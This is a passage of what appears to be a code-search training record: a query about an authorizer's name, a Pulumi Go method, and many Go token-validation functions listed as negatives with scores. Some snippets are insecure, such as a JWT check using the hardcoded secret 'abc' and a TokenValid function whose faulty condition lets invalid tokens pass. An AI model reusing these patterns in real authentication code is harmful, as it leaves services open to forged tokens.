!= nil {\n\t\t\trd = ssas.AuthRegData{}\n\t\t}\n\n\t\tif claims, ok := token.Claims.(*service.CommonClaims); ok && token.Valid {\n\t\t\trd.AllowedGroupIDs = claims.GroupIDs\n\t\t\trd.OktaID = claims.OktaID\n\t\t}\n\t\tctx := context.WithValue(r.Context(), \"ts\", tokenString)\n\t\tctx = context.WithValue(ctx, \"rd\", rd)\n\t\tservice.LogEntrySetField(r, \"rd\", rd)\n\t\tnext.ServeHTTP(w, r.WithContext(ctx))\n\t})\n}", "func (a *RedisAuthenticator) Validate(w http.ResponseWriter, r *http.Request) bool {\n\ttoken := getTokenFromRequest(r)\n\tif !isValidToken(token) {\n\t\thttp.Error(w, \"{\\\"error\\\": \\\"You are not authenticated to access this resource!\\\"}\",\n\t\t\thttp.StatusUnauthorized)\n\t\treturn false\n\t}\n\t// Make request to Redis database.\n\tconn := a.Redis.Get()\n\tdefer conn.Close()\n\tres, err := redis.Int(conn.Do(\"EXISTS\", \"octyne-token:\"+token))\n\tif err != nil {\n\t\tlog.Println(\"An error occurred while making a request to Redis!\", err) // skipcq: GO-S0904\n\t\thttp.Error(w, \"{\\\"error\\\": \\\"Internal Server Error!\\\"}\", http.StatusInternalServerError)\n\t\treturn false\n\t}\n\tif res != 1 {\n\t\thttp.Error(w, \"{\\\"error\\\": \\\"You are not authenticated to access this resource!\\\"}\",\n\t\t\thttp.StatusUnauthorized)\n\t}\n\treturn res == 1\n}", "func Check(token string) (bool, *Payload) {\n\treturn ParseJwt(token)\n}", "func ValidateEmailToken(tokenStr string) (bool, *EmailID, error) {\n\t//initialize the claims\n\tclaims := &EmailClaims{}\n\n\t//parse the JWT and load the claims\n\ttoken, err := jwt.ParseWithClaims(tokenStr, claims, getTokenKey)\n\tif err != nil {\n\t\tif err == jwt.ErrSignatureInvalid {\n\t\t\treturn false, nil, nil\n\t\t}\n\t\treturn false, nil, err\n\t}\n\n\t//verify the signing algorithm\n\tif token.Method.Alg() != JWTSigningAlgorithm {\n\t\treturn false, nil, fmt.Errorf(\"invalid signing algorthm: %s\", token.Method.Alg())\n\t}\n\n\t//check if the token is valid\n\tif !token.Valid {\n\t\treturn false, nil, nil\n\t}\n\n\t//extract the ids\n\tclaims.ParseIDs()\n\treturn true, &claims.EmailID, nil\n}", "func (s *Server) authTokenVerifier(auth JWTVerifier) func(next http.Handler) http.Handler {\n\treturn func(next http.Handler) http.Handler {\n\t\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t\tauthHeader := getHeader(r, headerAuthorization)\n\n\t\t\tif authHeader == \"\" {\n\t\t\t\ts.logger.Print(\"no authorization header found\")\n\t\t\t\thttp.Error(w, \"missing authorization header\", http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tsplitAuthHeader := strings.Split(authHeader, \" \")\n\t\t\tif len(splitAuthHeader) != 2 {\n\t\t\t\ts.logger.Printf(\"authorzation header value invalid: %s\", splitAuthHeader)\n\t\t\t\thttp.Error(w, \"improperly formatted authorization header\", http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tuserID, err := auth.VerifyJWT(r.Context(), splitAuthHeader[1])\n\t\t\tif err != nil {\n\t\t\t\ts.logger.Print(err)\n\t\t\t\thttp.Error(w, \"failed to verify authentication token\", http.StatusForbidden)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tif userID != getAccountID(r).String() {\n\t\t\t\thttp.Error(w, \"not authorized for given account\", http.StatusForbidden)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tnext.ServeHTTP(w, r)\n\t\t})\n\t}\n}", "func InvalidToken(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"text/html\")\n\tw.WriteHeader(http.StatusForbidden)\n\tfmt.Fprint(w, `Your token <strong>expired</strong>, click <a href=\"javascript:void(0)\" onclick=\"location.replace(document.referrer)\">here</a> to try again.`)\n}", "func ValidateToken(secretKey string, token string) error {\n\n\tif !sjwt.Verify(token, []byte(secretKey)) {\n\t\treturn errors.New(\"Token isn't valid\")\n\t}\n\n\tclaims, err := sjwt.Parse(token)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tissuer, err := claims.GetIssuer()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif issuer != \"goUpload\" {\n\t\treturn errors.New(\"No valid Issuer \")\n\t}\n\n\t// Validate will check(if set) Expiration At and Not Before At dates\n\terr = claims.Validate()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n\n}", "func Validate(r *http.Request, db *sql.DB) (UserID, error) {\n\ttokens, ok := r.Header[\"Authorization\"]\n\tif !ok {\n\t\treturn 0, ErrNoAuthHeader\n\t}\n\ttoken := strings.TrimPrefix(tokens[0], \"Bearer \")\n\tnow := time.Now().Unix()\n\tvar userID UserID\n\terr := db.QueryRow(`\n\t\tselect\n\t\t\toauth_sessions.owner_id\n\t\tfrom \n\t\t\toauth_access_tokens\n\t\t\tjoin oauth_sessions on oauth_access_tokens.session_id = oauth_sessions.id\n\t\twhere\n\t\t\toauth_access_tokens.id = $1\n\t\t\tand oauth_access_tokens.expire_time > $2\n\t\t`, token, now).Scan(&userID)\n\n\tif err == sql.ErrNoRows {\n\t\treturn 0, errors.Wrapf(ErrSessionInvalid, token)\n\t} else if err != nil {\n\t\tpanic(err)\n\t}\n\n\treturn userID, nil\n}", "func (t *Token) validate(nbfCheck bool) (err error) {\n\tvar zu = uuid.UUID{}\n\tvar ve = &ValidationError{}\n\tvar now = Timestamp(time.Now().Unix())\n\n\tif bytes.Equal(zu[:], t.Id[:]) {\n\t\tve.append(\"Token.Id is invalid (zero-UUID)\")\n\t}\n\n\tif bytes.Equal(zu[:], t.Subject[:]) {\n\t\tve.append(\"Token.Subject is invalid (zero-UUID)\")\n\t}\n\n\tif 0 == t.Issued {\n\t\tve.append(\"Token.Issued is invalid (zero-Timestamp)\")\n\t} else if t.Issued > now {\n\t\tve.append(\"Token.Issued is > time.Now()\")\n\t}\n\n\tif t.Expires != 0 && t.Expires < (now+5) {\n\t\tve.append(fmt.Sprintf(\n\t\t\t\"Token.Expires is < time.Now(); expired %v\",\n\t\t\tt.Expires.Time().String()))\n\t\tve.exp = true\n\t}\n\n\tif nbfCheck &&\n\t\tt.NotBefore != 0 &&\n\t\tint64(t.NotBefore) > (time.Now().Unix()-5) {\n\t\tve.append(fmt.Sprintf(\n\t\t\t\"Token.NotBefore is < time.Now(); not before %v\",\n\t\t\tt.Expires.Time().String()))\n\t\tve.nbf = true\n\t}\n\n\tif 0 != len(ve.errstrs) || ve.exp || ve.nbf {\n\t\terr = ve\n\t}\n\n\treturn\n}", "func (jp JWTProvider) Validate(tokenString string) bool {\n\tts := strings.Replace(tokenString, \"Bearer \", \"\", -1)\n\ttoken, err := jwt.Parse(ts, jp.verify)\n\tif err != nil {\n\t\tlogrus.Errorln(\"Error at token verification \", err)\n\t\treturn false\n\t}\n\treturn token.Valid\n}", "func (token UserToken) Valid() (err error) {\n\tif token.IssureAt+token.Expire <= time.Now().Unix() {\n\t\treturn jwt.NewValidationError(\"token is expired\", jwt.ValidationErrorExpired)\n\t}\n\treturn nil\n}", "func (v validator) Validate(tokenString string) (*token.Session, error) {\n\tclaims := &claims{}\n\ttok, err := jwt.ParseWithClaims(tokenString, claims, func(tok *jwt.Token) (interface{}, error) {\n\t\treturn v.secret, nil\n\t})\n\n\tif err != nil {\n\t\tlog.Printf(\"Error parsing jwt: %s\", err)\n\t\treturn nil, err\n\t}\n\n\tif !tok.Valid {\n\t\tlog.Printf(\"Token is considered invalid\")\n\t\treturn nil, fmt.Errorf(\"Token is considered invalid\")\n\t}\n\n\t// fill out the session to be used for the lifetime of the request\n\tsession := token.Session{}\n\tsession.Email = claims.Email\n\tsession.AccountID = claims.AccountID\n\tsession.ProfileID = claims.ProfileID\n\tsession.RestaurantID = claims.RestaurantID\n\n\treturn &session, nil\n}", "func VerifyToken(tokenStr string, secret_name string) (string, error) {\n\t var result = \"\"\n\t //Retrieve secret value from secrets manager\n\t secret, err := getSecretValue(secret_name);\n\t verifyToken, err := jwt.Parse(tokenStr, func(token *jwt.Token) (interface{}, error) {\n\t\t return[]byte(secret), nil\n\t })\n\t if err == nil && verifyToken.Valid{\n\t\t result = \"Valid\"\n\t } else {\n\t\t result = \"Invalid\"\n\t }\n\t log.Println(\"VerifyToken result =\", result)\n\n\t return result, err\n}", "func API(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) {\n\ttoken := r.Header.Get(\"token\")\n\n\tif token != \"\" {\n\t\ttokenValid, uuid, err := myJWT.CheckToken(token, \"\", true, false, false)\n\t\tif err != nil {\n\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t\tlog.Printf(\"Checking token error: %v\", err)\n\t\t\treturn\n\t\t}\n\n\t\tif tokenValid {\n\t\t\tcontext.Set(r, \"uuid\", uuid)\n\t\t\tnext(w, r)\n\t\t\treturn\n\t\t}\n\t}\n\n\tw.WriteHeader(http.StatusUnauthorized)\n}", "func ValidateAzureDevOpsPAT(token string) (string, error) {\n\tviperKey := \"azureDevOps.pat\"\n\tviperValue := viper.GetString(viperKey)\n\n\tif len(viperValue) == 0 {\n\t\treturn \"\", fmt.Errorf(\n\t\t\t\"the value for the '%s' key in the '%s' file has a length of zero\",\n\t\t\tviperKey,\n\t\t\tviper.ConfigFileUsed())\n\t}\n\n\trx := regexp.MustCompile(\"^[a-z0-9]{52}$\")\n\tif !rx.Match([]byte(token)) {\n\t\treturn \"\", fmt.Errorf(\n\t\t\t\"the '%s' key in the '%s' file is not correctly formed\",\n\t\t\tviperKey,\n\t\t\tviper.ConfigFileUsed())\n\t}\n\n\treturn token, nil\n}", "func TokenValid(r *http.Request) error {\n\ttoken, err := VerifyToken(r)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif _, ok := token.Claims.(jwt.Claims); !ok && !token.Valid {\n\t\treturn err\n\t}\n\treturn nil\n}", "func Filter(handlerFunc http.HandlerFunc) http.HandlerFunc {\n\treturn func(writer http.ResponseWriter, request *http.Request) {\n\n\t\t// Verify the JWT token\n\t\t_, err := ExtractToken(request)\n\t\tif err != nil {\n\t\t\thttp2.HandleUnauthorizedError(writer, request.RequestURI, err)\n\t\t\treturn\n\t\t}\n\n\t\t// Call the next filter\n\t\thandlerFunc(writer, request)\n\t}\n}", "func Token(val string) Argument {\n\treturn func(request *requests.Request) error {\n\t\trequest.AddArgument(\"token\", val)\n\t\treturn nil\n\t}\n}", "func Request(req *http.Request) error {\n\tvar (\n\t\troute = middleware.MatchedRouteFrom(req)\n\t\tuser = FromContext(req.Context())\n\t)\n\n\tfor _, auth := range route.Authenticators {\n\t\tscopes := auth.Scopes[\"token\"]\n\n\t\tif len(scopes) == 0 {\n\t\t\treturn nil // The token is valid for any user role\n\t\t}\n\n\t\t// Check if any of the scopes is the same as the user's role\n\t\tfor _, scope := range scopes {\n\t\t\tif scope == user.Role {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}\n\treturn fmt.Errorf(\"forbidden\")\n}", "func (p LogonRealmExPacket) Token() string {\n\ttoken := make([]byte, 64)\n\tcopy(token[0:16], p[4:20])\n\tcopy(token[16:64], p[28:76])\n\treturn hex.EncodeToString(token)\n}", "func LoginVerification(c *gin.Context) {\n\ttokenStr := c.Request.Header.Get(\"Authorization\")\n\tusername, valid, err := model.ParseToken(tokenStr[7:])\n\tif !valid || err != nil {\n\t\tc.JSON(http.StatusUnauthorized, gin.H{\n\t\t\t\"success\": false,\n\t\t\t\"error\": \"Unauthorized\",\n\t\t\t\"data\": \"\",\n\t\t})\n\t\tc.Abort()\n\t\treturn\n\t}\n\tc.Set(\"username\", username)\n\tc.Next()\n}", "func (s *userService) ValidateToken(ctx context.Context, token *pb.Token) (tokenOut *pb.Token, err error) {\n\tt, err := jwt.Parse(token.Token, func(token *jwt.Token) (interface{}, error) {\n\t\treturn []byte(config.Cfg.Jwt.Key), nil\n\t})\n\tif err != nil {\n\t\treturn\n\t}\n\tif !t.Valid {\n\t\terr = errors.New(\"token invalid\")\n\t\treturn\n\t}\n\tclaims := t.Claims.(jwt.MapClaims)\n\tif claims == nil {\n\t\terr = errors.New(\"token invalid\")\n\t}\n\tvar user pb.User\n\tuser.PrettyId = claims[\"id\"].(string)\n\tuser.Name = claims[\"name\"].(string)\n\tresult, err := s.dao.GetUserTokenFromRedis(config.Cfg.Redis.TokenKey + user.Name)\n\tif err != nil {\n\t\treturn\n\t}\n\tif result != t.Raw {\n\t\terr = errors.New(\"token invalid\")\n\t\treturn\n\t}\n\ttokenOut = &pb.Token{\n\t\tValid: true,\n\t}\n\treturn\n}", "func (m *JWTManager) ValidateToken(tokenString string) (*model.Token, error) {\n\ttoken, err := jwt.ParseWithClaims(tokenString, &jwt.StandardClaims{}, func(token *jwt.Token) (interface{}, error) {\n\t\tswitch token.Method {\n\t\tcase jwt.SigningMethodHS256:\n\t\t\treturn m.OP.PrivateKey, nil\n\t\tcase jwt.SigningMethodRS256:\n\t\t\treturn m.OP.PublicKey, nil\n\t\tdefault:\n\t\t\treturn nil, errors.New(\"JWT Token is not Valid\")\n\t\t}\n\t})\n\n\tif err != nil {\n\t\tswitch err.(type) {\n\t\tcase *jwt.ValidationError:\n\t\t\tvErr := err.(*jwt.ValidationError)\n\n\t\t\tswitch vErr.Errors {\n\t\t\tcase jwt.ValidationErrorExpired:\n\t\t\t\treturn nil, errors.New(\"Token Expired, get a new one\")\n\t\t\tdefault:\n\t\t\t\tlog.Printf(\"[INFO][Auth Middleware] %s\", vErr.Error())\n\t\t\t\treturn nil, errors.New(\"JWT Token ValidationError\")\n\t\t\t}\n\t\t}\n\t\treturn nil, errors.New(\"JWT Token Error Parsing the token or empty token\")\n\t}\n\tclaims, ok := token.Claims.(*jwt.StandardClaims)\n\tif !ok || !token.Valid {\n\t\treturn nil, errors.New(\"JWT Token is not Valid\")\n\t}\n\n\tif userID, err := strconv.Atoi(claims.Subject); err == nil {\n\t\treturn &model.Token{UserID: int64(userID)}, nil\n\t}\n\n\tv := tokenFormat{}\n\n\terr = json.NewDecoder(strings.NewReader(claims.Subject)).Decode(&v)\n\tif err != nil {\n\t\tlog.Printf(\"[INFO][Auth Middleware] TokenManager was not able to decode the Subject: %s\", claims.Subject)\n\t\treturn nil, errors.New(\"JWT token has a unknown subject format\")\n\t}\n\n\tt := model.Token{\n\t\tUserID: v.UserID,\n\t\tPermissions: make(map[string]bool),\n\t\tToken: tokenString,\n\t}\n\tif v.Permissions != nil {\n\t\tfor _, p := range *v.Permissions {\n\t\t\tt.Permissions[p] = true\n\t\t}\n\t}\n\n\treturn &t, err\n}", "func VerifyToken(tokData []byte, keyFile, keyType string) (iat string, err error) {\n\n\t// trim possible whitespace from token\n\ttokData = regexp.MustCompile(`\\s*$`).ReplaceAll(tokData, []byte{})\n\tif db100 {\n\t\tfmt.Fprintf(os.Stderr, \"Token len: %v bytes\\n\", len(tokData))\n\t}\n\n\t// Parse the token. Load the key from command line option\n\ttoken, err := jwt.Parse(string(tokData), func(t *jwt.Token) (interface{}, error) {\n\t\tdata, err := loadData(keyFile)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif isEs(keyType) {\n\t\t\treturn jwt.ParseECPublicKeyFromPEM(data)\n\t\t} else if isRs(keyType) {\n\t\t\treturn jwt.ParseRSAPublicKeyFromPEM(data)\n\t\t} else {\n\t\t\terr = fmt.Errorf(\"Error signing token - confg error: keyType=[%s]\", keyType)\n\t\t\treturn \"\", err\n\t\t}\n\t\treturn data, nil\n\t})\n\n\t// Print some debug data\n\tif db100 && token != nil {\n\t\tfmt.Fprintf(os.Stderr, \"Header:\\n%v\\n\", token.Header)\n\t\tfmt.Fprintf(os.Stderr, \"Claims:\\n%v\\n\", token.Claims)\n\t}\n\n\t// Print an error if we can't parse for some reason\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"Couldn't parse token: %v\", err)\n\t}\n\n\t// Is token invalid?\n\tif !token.Valid {\n\t\treturn \"\", fmt.Errorf(\"Token is invalid\")\n\t}\n\n\tif db100 {\n\t\tfmt.Fprintf(os.Stderr, \"Token Claims: %s\\n\", godebug.SVarI(token.Claims))\n\t}\n\n\t// {\"auth_token\":\"f5d8f6ae-e2e5-42c9-83a9-dfd07825b0fc\"}\n\ttype GetAuthToken struct {\n\t\tAuthToken string `json:\"auth_token\"`\n\t}\n\tvar gt GetAuthToken\n\tcl := godebug.SVar(token.Claims)\n\tif db100 {\n\t\tfmt.Fprintf(os.Stderr, \"Claims just before -->>%s<<--\\n\", cl)\n\t}\n\terr = json.Unmarshal([]byte(cl), &gt)\n\tif err == nil {\n\t\tif db100 {\n\t\t\tfmt.Fprintf(os.Stderr, \"Success: %s -- token [%s] \\n\", err, gt.AuthToken)\n\t\t}\n\t\treturn gt.AuthToken, nil\n\t} else {\n\t\tif db100 {\n\t\t\tfmt.Fprintf(os.Stderr, \"Error: %s -- Unable to unmarsal -->>%s<<--\\n\", err, cl)\n\t\t}\n\t\treturn \"\", err\n\t}\n\n}", "func TokenAuth() gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\ttokenString, _ := c.GetQuery(\"token\")\n\t\tif len(tokenString) == 0 {\n\t\t\ttokenString = c.GetHeader(\"Authorization\")\n\t\t}\n\t\tif len(tokenString) == 0 {\n\t\t\tc.AbortWithStatusJSON(400, gin.H{\"msg\": \"empty token.\"})\n\t\t\treturn\n\t\t}\n\n\t\ttoken, err := jwt.Parse(tokenString, func(token *jwt.Token) (interface{}, error) {\n\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\t\treturn nil, errors.New(\"validation error\")\n\t\t\t}\n\t\t\treturn []byte(\"abc\"), nil\n\t\t})\n\t\tif err != nil {\n\t\t\tc.AbortWithStatusJSON(400, gin.H{\"msg\": \"auth failed.\"})\n\t\t\treturn\n\t\t}\n\t\tif _, ok := token.Claims.(jwt.MapClaims); !ok || !token.Valid {\n\t\t\tc.AbortWithStatusJSON(400, gin.H{\"msg\": \"auth failed.\"})\n\t\t\treturn\n\t\t}\n\n\t}\n}", "func (t *Token) Validate() errstack.Builder {\n\tvar errb = errstack.NewBuilder()\n\tt.CreatedAt = time.Now().UTC()\n\tif len(t.ID) < 3 {\n\t\terrb.Put(\"id\", \"must be at least 3-characters long\")\n\t}\n\tif t.MaxTotalContrib.Int != nil && t.MaxTotalContrib.Cmp(zero) < 0 {\n\t\terrb.Put(\"maxTotalContrib\", \"can't be negative\")\n\t}\n\treturn errb\n}", "func (ident *Identity) Validate() error {\n\tif ident.ID == \"\" {\n\t\treturn errors.New(\"identity ID not set\")\n\t}\n\n\tif ident.PrivateKey == nil {\n\t\treturn errors.New(\"no identity private_key set\")\n\t}\n\n\tif !ident.ID.MatchesPrivateKey(ident.PrivateKey) {\n\t\treturn errors.New(\"identity ID does not match the private_key\")\n\t}\n\treturn nil\n}" ]
[ "0.5470086", "0.538882", "0.53538656", "0.52855575", "0.5248191", "0.52401423", "0.52155536", "0.51719457", "0.51408523", "0.51288927", "0.5112652", "0.5105326", "0.504248", "0.5032163", "0.5024669", "0.5000452", "0.49955586", "0.4995149", "0.49716762", "0.4967016", "0.49364254", "0.4927275", "0.49063098", "0.4876214", "0.4866804", "0.48665565", "0.48580503", "0.48533386", "0.48078078", "0.48014995", "0.4800654", "0.47878158", "0.47846827", "0.47789097", "0.4767407", "0.4757601", "0.47548515", "0.4753412", "0.4741881", "0.4740574", "0.4729734", "0.47268102", "0.47204885", "0.47175428", "0.47023624", "0.47007498", "0.46994957", "0.46979904", "0.46805117", "0.4676915", "0.46652788", "0.46635783", "0.46558782", "0.46521363", "0.46512285", "0.46511817", "0.46353188", "0.46332848", "0.463315", "0.46317086", "0.4629666", "0.4628348", "0.46136895", "0.4610156", "0.46063945", "0.46060306", "0.46060306", "0.46039203", "0.46024582", "0.45967218", "0.4595119", "0.45918795", "0.45817828", "0.45803338", "0.45798412", "0.45796722", "0.45675895", "0.4566949", "0.4561674", "0.45564502", "0.45533162", "0.45486274", "0.45482653", "0.45368123", "0.45356897", "0.4529494", "0.4528437", "0.4528404", "0.4527505", "0.45250568", "0.45233032", "0.4522751", "0.45207614", "0.45124763", "0.4512407", "0.45097765", "0.45086965", "0.45078245", "0.4504179", "0.44936022" ]
0.5086416
12
The name of the authorizer
func (r *Authorizer) Name() pulumi.StringOutput { return (pulumi.StringOutput)(r.s.State["name"]) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (c *authorizer) Name() string {\n\treturn c.config.Name\n}", "func (this *BaseHandler) Authorizer(key string) string {\n\tvalue, ok := this.RequestVO.Request.RequestContext.Authorizer[key].(string)\n\tif ok {\n\t\treturn value\n\t}\n\tlogs.Error(\"BaseHandler : Authorizer : unable to get \", key, ok, this.RequestVO.Request.RequestContext.Authorizer)\n\treturn \"\"\n}", "func (a Authorizer) ProviderName() string {\n\treturn ProviderName\n}", "func (a Authorizer) ProviderName() string {\n\treturn ProviderName\n}", "func (c *Authorize) Name() cli.CmdName {\n\treturn CmdNmAuthorize\n}", "func (o *ShortenerAPI) Authorizer() runtime.Authorizer {\n\n\treturn o.APIAuthorizer\n\n}", "func (u basicAuthorizationProvider) Name() string {\n\treturn \"BasicAuthorizationProvider\"\n}", "func authorize(name string) error {\n\tif distro.Get() == distro.Synology {\n\t\treturn authorizeSynology(name)\n\t}\n\treturn nil\n}", "func (o *CredentialProviderAPI) Authorizer() runtime.Authorizer {\n\n\treturn nil\n\n}", "func (o *HighLoadCup2020API) Authorizer() runtime.Authorizer {\n\treturn nil\n}", "func (h Oauth1Handler) Name() string { return h.name }", "func (o MethodOutput) AuthorizerId() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Method) pulumi.StringPtrOutput { return v.AuthorizerId }).(pulumi.StringPtrOutput)\n}", "func (o *CloudTidesAPI) Authorizer() runtime.Authorizer {\n\treturn nil\n}", "func (b backgroundPlugin) Name() string {\n\treturn \"auth\"\n}", "func (o *WeaviateAPI) Authorizer() runtime.Authorizer {\n\treturn o.APIAuthorizer\n}", "func (c Client) authorizer() Authorizer {\n\tif c.Authorizer == nil {\n\t\treturn NullAuthorizer{}\n\t}\n\treturn c.Authorizer\n}", "func (plugin *Auth) Name() string {\n\treturn plugin.name\n}", "func Authorizer(ctx workflow.Context, evt events.APIGatewayCustomAuthorizerRequest) (err error) {\n\tauthService := new(services.AuthService)\n\tres, err := authService.GetAuthorizerResponse(evt)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tctx.SetRawResponse(res)\n\treturn nil\n}", "func (s Authorizer) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s Authorizer) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s Authorizer) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (c *Cfg) Authorizer(resource string) autorest.Authorizer {\n\tc.mu.Lock()\n\tdefer c.mu.Unlock()\n\tauthz := c.authz[resource]\n\tif authz == nil {\n\t\tauthz = c.newAuthz(resource)\n\t\tif c.authz == nil {\n\t\t\tc.authz = make(map[string]autorest.Authorizer)\n\t\t}\n\t\tc.authz[resource] = authz\n\t}\n\treturn authz\n}", "func (o *DataPlaneAPI) Authorizer() runtime.Authorizer {\n\n\treturn o.APIAuthorizer\n\n}", "func (o *StorageAPI) Authorizer() runtime.Authorizer {\n\n\treturn nil\n\n}", "func (o *authImpl) Name() string {\n\treturn \"jwt\"\n}", "func (a *ACLRoleDeleteCommand) Name() string { return \"acl token delete\" }", "func (or *orchestrator) name() string {\n\treturn \"orchestrator\"\n}", "func (e VerifyHandler) Name() string { return e.ProviderName }", "func Authorization(ctx context.Context) (string, error) {\n\treturn fromMeta(ctx, AuthKey)\n}", "func (*accountingCollector) Name() string {\n\treturn \"Accounting\"\n}", "func (s *LoginServer) Authorizer(a Authorizer) {\n\ts.authLock.Lock()\n\ts.auth = a\n\ts.authLock.Unlock()\n}", "func (o AuthorizationPolicyOutput) Name() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *AuthorizationPolicy) pulumi.StringOutput { return v.Name }).(pulumi.StringOutput)\n}", "func Authorizer(userService userService, jwtService jwtService) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\taccessToken := extractToken(c)\n\t\tif accessToken == EmptyToken {\n\t\t\tabort(c, http.StatusBadRequest, \"Authorization header is missing or empty\")\n\t\t} else {\n\t\t\tparseJwt, err := jwtService.ParseJwt(accessToken)\n\n\t\t\tif err != nil {\n\t\t\t\tabort(c, http.StatusBadRequest, err.Error())\n\t\t\t} else if err := userVerification(c, parseJwt, userService); err != nil {\n\t\t\t\tabort(c, http.StatusUnauthorized, \"Unauthorized\")\n\t\t\t}\n\t\t}\n\t}\n}", "func (a Authorizers) Names() []string {\n\tresult := make([]string, 0, len(a))\n\tfor k, _ := range a {\n\t\tresult = append(result, k)\n\t}\n\treturn result\n}", "func (s *ClusterScope) Authorizer() autorest.Authorizer {\n\treturn s.AzureClients.Authorizer\n}", "func (o LookupAuthorizerResultOutput) Name() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupAuthorizerResult) string { return v.Name }).(pulumi.StringOutput)\n}", "func authorizeSynology(name string) error {\n\tf, err := os.Open(\"/etc/group\")\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer f.Close()\n\ts := bufio.NewScanner(f)\n\tvar agLine string\n\tfor s.Scan() {\n\t\tif !mem.HasPrefix(mem.B(s.Bytes()), mem.S(\"administrators:\")) {\n\t\t\tcontinue\n\t\t}\n\t\tagLine = s.Text()\n\t\tbreak\n\t}\n\tif err := s.Err(); err != nil {\n\t\treturn err\n\t}\n\tif agLine == \"\" {\n\t\treturn fmt.Errorf(\"admin group not defined\")\n\t}\n\tagEntry := strings.Split(agLine, \":\")\n\tif len(agEntry) < 4 {\n\t\treturn fmt.Errorf(\"malformed admin group entry\")\n\t}\n\tagMembers := agEntry[3]\n\tfor _, m := range strings.Split(agMembers, \",\") {\n\t\tif m == name {\n\t\t\treturn nil\n\t\t}\n\t}\n\treturn fmt.Errorf(\"not a member of administrators group\")\n}", "func (a Admin) CollectionName() string {\n\treturn \"admins\"\n}", "func Authorized() runtime.Authorizer {\n\treturn runtime.AuthorizerFunc(func(_ *http.Request, _ interface{}) error { return nil })\n}", "func (a *authorizer) Authorize(method string, r model.Role) bool {\n\tswitch method {\n\tcase \"/pipe.api.service.webservice.WebService/AddEnvironment\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateEnvironmentDesc\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/RegisterPiped\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/RecreatePipedKey\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/EnablePiped\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/DisablePiped\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/AddApplication\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/EnableApplication\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/DisableApplication\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateProjectStaticAdmin\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/EnableStaticAdmin\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/DisableStaticAdmin\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateProjectSSOConfig\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateProjectRBACConfig\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/SyncApplication\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/CancelDeployment\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/ApproveStage\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/GenerateApplicationSealedSecret\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetApplicationLiveState\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetProject\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetCommand\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListDeploymentConfigTemplates\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListEnvironments\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListPipeds\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetPiped\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListApplications\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetApplication\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListDeployments\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase 